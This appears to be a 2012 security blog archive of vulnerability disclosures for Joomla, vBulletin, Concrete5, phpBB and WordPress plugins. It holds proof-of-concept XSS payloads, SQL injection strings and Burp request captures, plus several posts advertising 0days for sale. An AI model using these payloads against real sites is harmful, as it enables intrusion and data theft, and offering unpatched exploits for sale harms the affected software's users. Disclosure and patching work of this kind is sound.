Thursday 27 December 2012

[EN] 5 RCE in GetSimple 3.1.2 - Updated

Latest GetSimple CMS (3.1.2) is vulnerable to authentication bypass, and remote code exec.

RCE in latest GetSimple CMS



One of five exploits is here.
To all of you, who mailed me with feedback - thanks!

If you need 4 sploit more (to testing) - just let me know;)

o/

Monday 24 December 2012

[EN] OSSEC Cool Dashboard - New release!

This time update version is with number 0.5, what you can check here. :)

As always Jess was extremly fast with new patch. Work with such a good coder is a pleasure.

Now, check OCD!

Friday 21 December 2012

[EN] All about filtering...

To know how I feel when I'm testing 'another' web-code, watch this. ;D

Merry Xmas ;)
o/

Thursday 20 December 2012

[EN] Joomla 3.0.2 leaked again

Joomla 3.0.2 is vulnerable to sql leak.

If user supplied malformed data to cookie (by adding a value to md5 string), then
sql leak is possible and Joomla's table names prefix can be read.

Add 'malformed' value here - Burp

... and now you can see an error from <prefix>_session table:

SQL Leak - now you know what is the prefix

:)

If you watch this request/response you will see that those screens was created from 'administrators' link. To stop comments like 'not usefull because possible from admin' - try to reproduce this from normal (registered) or pre-auth user. ;)

Another place where user can input malformed data, looks like this:

SQL Leak


cheers

[EN] Constant Contact for WordPress 2.3.12 XSSed

Constant Contact for WordPress 2.3.12 is vulnerable to XSS attack.

cc_username and cc_password parameters are vulnerable to persistent XSS.

[EN] Dooodl (1.1.4) XSSed

"History Viewer Look & Feel" in latest Dooodl is vulnerable to persistent XSS.

All forms available at wp-admin/admin.php?page=dooodl_gallery_layout&settings-updated=true
are vulnerable to XSS attack.

Add filtering for user input for parameters described as:
Body backgroundcolor, Dooodl item backgroundcolor, Link backgroundcolor, Link textcolor,
Title textcolor, General textcolor, Title backgroundcolor, Intro backgroundcolor, Intro textcolor

[EN] Constant Contact for WordPress 2.3.12 XSSed

In latest Constant Contact for WordPress (2.3.12) we have two vulnerable parameters.

cc_username and cc_password parameters are vulnerable to persistent XSS.

[EN] Admin Menu Editor XSSed

Latest version of "Admin Menu Editor" (1.1.13) plugin is vulnerable to persistent XSS attack.

Try to add some filtering in "Menu title" form ;)

[EN] Google Analyticator 6.4.1 XSSed

Google Analyticator 6.4.1 is vulnerable to cross-site scripting.


'Download extensions to track' is vulnerable to XSS.

Also ga_adsense, ga_extra, ga_extra_after and ga_outbound_prefix parameters are also vulnerable to XSS.


[EN] Faster Image Insert 2.4.0 XSSed

Faster Image Insert (2.4.0) is vulnerable to XSS attack.

'Set custom string' form is vulnerable to XSS.
'Custom post types' is also vulnerable.

[EN] Events Manager 5.3.2.1 XSSed

Events Manager 5.3.2.1 is vulnerable to cross-site scripting.

'pno', '_wpnonce', 'cols', 'limit' parameters are vulnerable to XSS.

'Bypass' for include xss code for limit parameter can be done by adding:
limit="></option></select><img src=x onerror=alert(1)><option>
(because you must close <option> and <select> tags and then add xss).

[EN] Google Analytics for WordPress 4.2.8 XSSed

Google Analytics for WordPress (4.2.8) is vulnerable to cross-site scripting.

In wp-admin/options-general.php?page=google-analytics-for-wordpress page
go to "Internal Links to Track as Outbound" and as a 'Internal links to track as outbound'
form, type your XSS code.

'Label to use' form is also vulnerable. Both are persistent.

Tuesday 18 December 2012

[EN] Installing WP-plugins without FTP server

Few times when I was testing some plugins for Wordpress I was wondering how can I install plugin without FTP server. Wordpress after default installation needs configured ftp when you want to install new plugin, but here is one quick-hack I found at net:

Edit your wp-config.php file and add there line:
define('FS_METHOD', 'direct');

Now save your file, and enjoy installing plugins without ftp server. :)

Cheers
o/

[EN] WP-StatsDashboard XSSed

http://wordpress.org/extend/plugins/wp-stats-dashboard/

Very nice WordPress plugin. But it's vulnerable to XSS :)

When you're in 'Basic settings' type your 'Blog ID' name in HTML :]

This post will be updated, because in this plugin we will have more bugs.


Cheers o/



[EN] FIAGallery 2.16 Persistent XSS

Sure it's another 'admin' XSS, anyway - bug is bug ;)

XSSed parameter 
Check it out at http://wordpress.org/extend/plugins/flash-album-gallery/.

Add htmlentities() to display this variable.

[EN] ReFlex Gallery 1.3 - Persistent XSS

ReFlex Gallery 1.3 - Multiple persistent XSS:
http://wordpress.org/extend/plugins/reflex-gallery/

'Enter Gallery Name' and 'Enter Gallery Description' are vulnerable to XSS.

Try to filter inputs from users in add-gallery.php:
<code>
43:    <p><input type="text" name="galleryCode" value="[ReflexGallery id='<?php echo $this->reflexdb->getNewGalleryId(); ?>']" size="40" /></p></div>
70:                <td><input type="text" size="30" name="galleryName" value="<?php echo $galleryName; ?>" /></td>
75:                <td><input type="text" size="50" name="galleryDescription" value="<?php echo $galleryDescription; ?>" /></td>
</code>

To patch it, just add htmentities(). Like this:

<code>

kuba@box:~/public_html/wp3.5/wordpress/wp-content/plugins/reflex-gallery/admin$ grep htmlentities -n add-gallery.php
70:  <td><input type="text" size="30" name="galleryName" value="<?php echo htmlentities($galleryName); ?>" /></td>
75:  <td><input type="text" size="50" name="galleryDescription" value="<?php echo htmlentities($galleryDescription); ?>" /></td>
kuba@box:~/public_html/wp3.5/wordpress/wp-content/plugins/reflex-gallery/admin$

</code>


:)

[EN] WP Easy Gallery 2.6 XSS'ed - updated

Multiple XSS vulnerabilities found in latest WP Easy Gallery:

XSS is possible because parameter "galleryName" is not filtered.
User can add JS/HTML as a 'Gallery Name', so exploitation is possible.

As you can see below, 'galleryDescription' is also vulnerable.

If you want to check which one parameter is vulnerable here too, type at console:

<code>
kuba@box:~/public_html/wp3.5/wp-content/plugins/wp-easy-gallery/admin$ grep -n echo add-gallery.php | grep php | grep -e "\\$"

(...)
75: <td><input type="text" size="30" name="galleryName" value="<?php echo $galleryName; ?>" /></td>
80: <td><input type="text" size="50" name="galleryDescription" value="<?php echo $galleryDescription; ?>" /></td>
85: <td><input id="upload_image" type="text" size="36" name="upload_image" value="<?php echo $imagepath; ?>" />
91: <td><input type="text" size="10" name="gallerythumbwidth" value="<?php echo $thumbwidth; ?>" /></td>
96: <td><input type="text" size="10" name="gallerythumbheight" value="<?php echo $thumbheight; ?>" /></td>

(...)
 kuba@box:~/public_html/wp3.5/wp-content/plugins/wp-easy-gallery/admin$
</code>
------------------------------------

Update:
Also parameter "select_gallery" is vulnerable to this attack.

Update : 27.12.2012:

galleryName, galleryDescription, upload_image, gallerythumbwidth, gallerythumbheight
parameters are not filtered after users input.

Payload to reproduce this vulnerability:
']"/><body onload=alert(/boom/)>



[EN] Concrete5 CMS 6.0.2 - multiple vulnerabilities

Hi,

Concrete5 Team is creating a patch for my last few findings.

Once the patch is released, a more detailed info will be published.

Cheers,
o/

[EN] ATutor 2.1 vulnerabilities

Hi,

few findings at Atutor CMS .

I must say that Developers Team is really fast :)

Good job, thanks!

(Post will be updated as soon as dev-team will release the patch.)

* Update 20.12.2012 *
Today dev team send me information about patch. 
Post will be updated as soon as possible.  

o/

[EN] phpWebSite XSS

In cooperation with Matt, I would like to present you new patch for phpWebSite 1.7.3 :)

Matt, thanks for a fast reply and writting patch. It was pleasure to work with you!

Details here, so update please ;)

Monday 17 December 2012

[EN] LinkedIn.com XSSed

Yes yes, LinkedIn is vulnerable to persistent XSS :)

I found a vulnerability for users logged in. This time it is stored (persistent) XSS.
But it will be 'private' until LinkedIn Staff will secure it.

Cheers
o/

Tuesday 27 November 2012

News for 27.11.2012

Hi there,

thanks for watching and all your emails! ;)

Finally I decide to publish here some news for you, so watch me carefully,
changes soon.

cheers
o/

Tuesday 11 September 2012

News for 09.2012

Hi ;]

As You can see, blog is not updated since last few days.
It's all because of my new job! :)

So if You have any questions, ask me directly via e-mail please.
I will answer (as always) asap.

Cheers! o/

Thursday 30 August 2012

[EN] Persistent XSS in Concrete5.5.2.1 - 31.08 updated

* persistent xss

+ sql leak






... still testing so more - soon! ;]

* updated at 00:33 *

BIG thanks to Concrete5 Team for a fast reply, and fix! :)
Impressive!



* updated at 31.08 *

Check  some changes here and here.
Also You can try new version of Concrete5 here.

Wednesday 29 August 2012

[EN] TomatoCart 1.1.7 vulnerable to XSS


 For example:
../tomatocart/ext/securimage/example_form.ajax.php:39:
           new Ajax.Request('<?php echo $_SERVER['PHP_SELF'] ?>',


Cheers o/

Monday 27 August 2012

[EN] Reflected XSS in latest e107 CMS (1.0.1)

Hi ;)

Some one asked me about this case in mail, so here is the answer:


1. Go to 'register' page:


2. As Your e-mail confirmation, add yourm@il +  code from screen nr 3:




3. View from Burp Proxy:



4. ... and another one, parameters:



Cheers ;)

o/

Saturday 25 August 2012

[EN] phpBB 3.0.10 with 'stopped MySQL' funny one

Hi ;]

Check it out: when You ('for example') have some 'troubles'* with Your database,
then 'me as a pentester' can get some 'usefull' information, when You have also installed phpBB. Idea is crazy but... it's just a talk, so ... ;)

Anyway, looks like this:
'Idea'-info...



... and we can do it like that:

Two (paranoid;)) scenarios:
- first: Your database (port) is ddosed/maybe crashed by some 'time limit'/to-many-connection-from-webapp-situations, and so on...
- second: database stopped in this or other way.

...and now: "plus" 'all above', if You have installed (default) phpBB 3.0.10,
You can get this information: "this maybe is default installed 'all'-server-soft"...

:) So, like I said, this 'could be' valuable information for tester, because now
he/she can 'hit' other "defaults", for example, with DirBuster, nmap, and so on.

How to repair that? Maybe quick-fix should be to remove 'adding' line about
where is .sock-file?

Let me know what do You think :)

Enjoy Your weekend!
o/

Saturday 4 August 2012

[EN] JavaScript Payload - GET Idea (1)

Hi,

maybe You'll get the idea of 'how XSS can be used at your page'
after a lecture this sample code:)

Enjoy and remember to test Your webapps! ;)

Code @ pastebin
o/


Wednesday 1 August 2012

[EN] This week TODO

Hi,

to the end of this week, I will publish here few posts about what I'm doing right now. For now, it'll be:
- my new presentation about web security (will be here today/tommorow),
- few examples of XHR attacks,
- maybe some new bugs (if time permits... ;) ).

So - see You soon! ;)

Have a nice day
o/

Tuesday 31 July 2012

[EN] phpBB3 3.0.10 "Text-insertion bug"



Hi,

I found weird bug in phpBB3 (3.0.10).

Once again, when I'm doing webapp pentests,
vulnerable parameter is 'connected' with date (functions).

Here You have some source code from text added (permanently) to phpBB board:

Example 1:



Example 2:


If You need more details about it, let me know via comments or e-mail.

Cheers! :)

Sunday 29 July 2012

[EN] 2 codes for building payloads

Hi,

If You like playing with Burp or Paros, probably You will get the idea
of :

/*
 * ascii2html.c - simple payload coder
 */

#include <stdio.h>
int main(){
    char ch;
   
    printf("what to say:\n");
    while((ch = getchar()) != NULL){
        printf("&#%d",ch);
    }
    return 0;
}
 and:

/*
 * ascii2url.c - simple payload coder(2)
 */

#include <stdio.h>
int main(){
 char ch;

 printf("what to say:\n");
 while((ch = getchar()) != NULL){
  printf("%%%x",ch);
 }
 return 0;
}
Idea is simple, so maybe it will helps ;) Enjoy o/

[EN] Hacking vBulletin 4.2.0 via Google... :)


Hi,

I saw that few of You are watching me from some forums about let's say
'security'. ;)

That's how I found a simple trick to bypass 'authorized view only'
if You're using (last) vBulletin 4.2.0.

Ok, so. Example:
I found at stats few links like:
http://some-security;)-for.um/post-for-logged-in.bla

When I want to copy/paste this link in address bar there will be 'error':
"You are not logged in.", etc, etc...

But :)

...we can try to do one things to check this 'logged-only' content/site:)

1. Copy/paste Your '4logged-only'-link and search it via google.com
2. Next, go after 'copy' link.
3. Tadam! :D Content for logged-in users.

Enjoy ;)

o/

Thursday 26 July 2012

[EN] phpBB3 SQL Injection - updated (31.07)

Hello :)

After a little break and multiple tasks to do, few minutes ago I found one surprise
in latest phpBB3.

This is 'so called' sql-information-leak via parameter manipulation (related to SQL).

I will not public full information today, because maybe some of You want to test Your installations before.

If so - let me know. Maybe I should help with full webapp pentest.


* updated 10:11 *
- Found second vulnerable parameter :)

* updated 28.07 *
- another two parameters are vulnerable

* updated 31.08 *
 Detailed story once again at PacketStorm.

Cheers ;) o/

Wednesday 27 June 2012

vBulletin 4.2 persistent XSS

Because my bug leaked somehow, here you have full detailed info:

                                                                     
                                                                     
                                                                     
                                             
[ TITLE ....... ][ Persistent Cross-Site Scripting in vBulletin 4.2
[ DATE ........ ][ 15.06.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.2
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?

 This is persistent cross-site scripting attack. 
Vulnerability can be exploited by normal ("registered") user.

[--------------------------------------------[
[ 3. Where is bug :)

To exploit this vulnerability we need (to create/register) account of normal user:

 3.1. Go to Your http://vBullet.in/forum/ and log in as a "normal user". (screen01)
 3.2. After login in, we are redirecting to /activity.php (This page is called 'Activity Stream').
 3.3. Now (as a registered user), we need to go to our /forum/calendar.php.
 3.4. We are now at "HOME-> Calendar ->Default Calendar". Now (on right) we must click 
      to 'Add new event'. (screen02)
 3.5. Vulnerable form here is 'Title'. To check it, type as a title something like:
      test-title'><h1>Hi<br>Noam</h1><script>alert(123);</script> (screen03).
 3.6. And now. Your 'new event' is added 'as a clear text' - by 'clear text' I mean
      'text only, without XSS'. But...
 3.7. Logout now, and log-in again. Your added XSS-code, will be presented at
      first page (activity.php) for user who will log in.

If You want re-test this bug, You should create 2 users: registered1 and registered2.
Add payload ('add new event') as a registered1, and log out. Now log-in as a registered2,
and after login-page, there should be trigerred XSS.


[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Pentests - mail me.
]
[ Best regards
[ 

Monday 4 June 2012

[EN] Persistent XSS for admin in WP 3.3.2 - wanna? ;)

Yes, yes, "for admin only".

...if 'admin' = user who can create something. But 'what'? ;]
I will tell first to all of You, who will send me mail ;)

(And yes, I just want to check, that you 'are' interested (or 'not') for 'bugs' in admin panels too.
Who knows, maybe some of You are paranoid like me ;P and want to 'secure all' ;D

If so, You know when You can find me ;)

Cheers o/

Sunday 3 June 2012

[EN] Joomla 2.5.4 - remote user logout bug

Yes, that seems to be, that in (still) latest Joomla (2.5.4) we have a so-called-bug.

By sending malformed request to the user, we are able to "logout" him.

Why this could be used for attack? So, badguy, can change (deface) your companys site,
and add there a password-stealer (to php code for example).

Now he can logout all users like a sniper. ;]

(Yes yes, there is a way from admin panel to do the same, but who cares...? ;))

I want finish some test right now, and for a few hours there will be update here.

...and thanks for watching at all-this-break ;)

Cheers o/
;)

Thursday 24 May 2012

[EN] Hi from May ;)

This is very busy week (or month) for me (good!:D), so
right now I just want to thank You for all mails, comments
and talks. Blog will be updated very soon (for 100% before 1.06). So...

See You soon! ;)
 o/

Friday 11 May 2012

[EN] Jobs for Denmark and Brazil

Friend of mine is looking for a new people to join to his company as a Suppor Team Member.
I don't know the details but if You want, let me know (via e-mail) and I will contact You directrly.

Enjoy! ;)

o/


Monday 7 May 2012

[EN] Ohhh, baby...


8.05 - Updated!

In a few days I will add here another 'a little article' about testing webapps.
This time we will try to check a ... aa whatever, You will see soon ... ;D

--
Thanks for watching and regards! o/



Monday 30 April 2012

[EN] Joomla 2.5.4 "SQL Info leak"

Ok,

so maybe You have 'display_errors=On' (or sth... still) on Your site...

So try this at Your localhost:

It's important to mention that if You ('attacker') get this error,
You (he is) are able to view 'randomed' Joomla-prefixes for some names.
Look at screen in JOIN query.

Cheers! o/

[EN] vBulletin 4.1.12 - 'SQL Info leak' - up9.05

Sold. No more public.

Cheers o/

[EN] vBulletin 4.1.12 Cross-site scripting

[ TITLE ....... ][ vBulletin 4.1.12 Reflected XSS (try csrf*) for registered users
[ DATE ........ ][ 24.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.

(* ..., because I think this could be extended to attack
with 'non-visible button'. ;))

[--------------------------------------------[
[ 3. Where is bug :)

When You are logged-in as a normal user, You can add post to forum.
You can add title (parameter "subject") of Your post only with 85 characters.
And that's the trick, because error displayed to user (if 'subject' is > 85 chars)
can contain XSS code.

Try to add Ax85+"><xss><

Screen from attack You can see below:






[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.vbulletin.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Questions? Mail me.
[
[ Cheers o/

[EN] Buy 0days

I have few new 0days for Your webapps ;)

Latest Joomla, Wordpress, Drupal, TYPO3, vBulletin... it will be good start to talk.

If You want anything - mail me.

o/

Saturday 28 April 2012

[EN] vBulletin 4.1.12 information disclosure - (01.05 UP)

Sure :)
...I don't have a 'free May... :P

So here one example:

Right now I can not tell more, but... See You soon! ;)

* Updated - 01.05 *  

Hi again,

To the point: if user can add content (like ‘new page’ – what is not in default installation;))
he can manipulate a little with parameters to get as an answer some 'information disclosure' bug.

And hereąs the example answer:


Check this line for more "information" ;)

Enojy! o/

Friday 27 April 2012

[EN] Work to win 0day ;)


Yeah, yeah...;]

"Work"... like this:
currently I have few "notes" about "possible" rce bugs in few top10 webapps.

If You're interested to check it out, You know where You can find me... ;)

Regards
o/

[EN] Joomla 2.5.4 Information disclosure

Hi! :) Busy week and busy month... ;)

I have one more information for You today:
in latest Joomla I found information disclosure bug.

Why it's 'information disclosure' (for now)? Because I'm still developing working exploit for "this
parameter". I think it could be extended to other 'validation attacks'... so :D

For now, it's only 'information' (for You). ;)

I will update this information later (maybe next week), but now I have too much to do.

Anyway, if You need "no-public help", as always - mail me;)

Cheers! o/

EDIT: This is one bug I want to taka look more because it's available for not-logged-in users.
So "my favourite"! ;)

[EN] Wanna 0day for Your webapp? ;)

Ok. It's simple:
mail me with request for webapp (name and version) and I will tell You
what I have for it. Simple? ;)

Details we will discuss privately.

Cheers! ;)

Thursday 26 April 2012

[EN] Update for April! - finally (part 3)


As You can see below, I paste it few news. Check it out! ;)


Comments / questions are welcome!

Cheers o/

[EN] Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)


[ TITLE ....... ][ Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)
[ DATE ........ ][ 23.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://concrete5.org
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross-site scripting.

[--------------------------------------------[
[ 3. Where is bug :)
Below I present You some traffic from Burp Proxy:

...[cut from Burp]...
GET /concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?
approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata HTTP/1.1
Host: localhost
(...)
X-Requested-With: XMLHttpRequest
Cookie: CONCRETE5=...

...[end of cut]...

So vulnerable parameter is "approveImmediately", check it out:

...[answer (response) from Burp]...
(...)
<form method="post" name="permissionForm" id="ccmMetadataForm" action="http://localhost/concrete5.5.2.1/index.php?cID=102&ccm_token=...:...">
<input type="hidden" name="approveImmediately" value=""><img src=x onerror=alert(123123123)>" />
(...)

...[end of response]...


[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete 5.5.2.1 Cross Site Scripting


[ TITLE ....... ][ Concrete 5.5.2.1 Cross Site Scripting
[ DATE ........ ][ 23.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross site scripting vulnerability.

[--------------------------------------------[
[ 3. Where is bug :)
...raw cut from Burp...
POST /concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form HTTP/1.1
(...)
...end cut...

And 'cut' from answer with our 'payload':
"
(...)
<script type="text/javascript" src="/www/concrete5.5.2.1/concrete/js/tiny_mce/tiny_mce.js?v=aa5e8ba94816af5cea082fa1b3a32500"></script>
<script type="text/javascript" src="/www/concrete5.5.2.1/index.php/tools/required/page_controls_menu_js?cID=121&amp;cvID=&amp;btask='';!--"<body onload=alert(12312312323)>=&{()}&amp;ts=1335145603"></script>
</body>
(...)
"

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete 5.5.2.1 CMS - SQL Injection


[ TITLE ....... ][ Concrete 5.5.2.1 CMS - SQL Injection
[ DATE ........ ][ 22.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
SQL Injection.

[--------------------------------------------[
[ 3. Where is bug :)
Vulnerable parameter is fID. For example (from mysqls logs):

    60832 Query    insert into DownloadStatistics (fID, fvID, uID, rcID) values (NULL, 0, 1, 0)
        FROM Files LEFT JOIN FileVersions on Files.fID = FileVersions.fID and FileVersions.fvIsApproved = 1
        WHERE Files.fID = '1 waitfor delay \'0:0:10\'--'
        FROM Files LEFT JOIN FileVersions on Files.fID = FileVersio

Ok, so now we know that sql injection occurs in parameter for 'statistic' (if file=downloaded >+1@stats).

Enjoy but I saw that this parameter is available only for admin, so... ;> .

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete5.5.2.1 CMS information disclosure bug

[ TITLE ....... ][ Concrete5.5.2.1 CMS information disclosure bug
[ DATE ........ ][ 22.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure bug.

[--------------------------------------------[
[ 3. Where is bug :)
(...raw cut from Burp...)

GET /concrete5.5.2.1/index.php/search/?search_paths%5B%5D=&query=aaaaaaaaaaaa&submit=Search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
(...)
Referer: http://concrete-host/concrete5.5.2.1/index.php/search/
Cookie: CONCRETE5=%2f%2a%2a%2fAND%2f%2a%2a%2f1%3d0%2f%2a%2a%2fUNION%2f%2a%2a%2fALL%2f%2a%2a%2fSELECT%2f%2a%2a%2f@@version,%2f%2a%2a%2f2--; (...)=(...); PHPSESSID=phpsessid
Connection: close

(...end cut...)

Hm :)

So answer is (for vulnerable php.ini of course):
"


<br />
<b>Warning</b>:  session_start() [<a href='function.session-start'>function.session-start</a>]:
The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and
'-,' in <b>/www/concrete5.5.2.1/concrete/startup/session.php</b> on line <b>32</b><br />
<!DOCTYPE html>
<html lang="en">
(...)
"

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[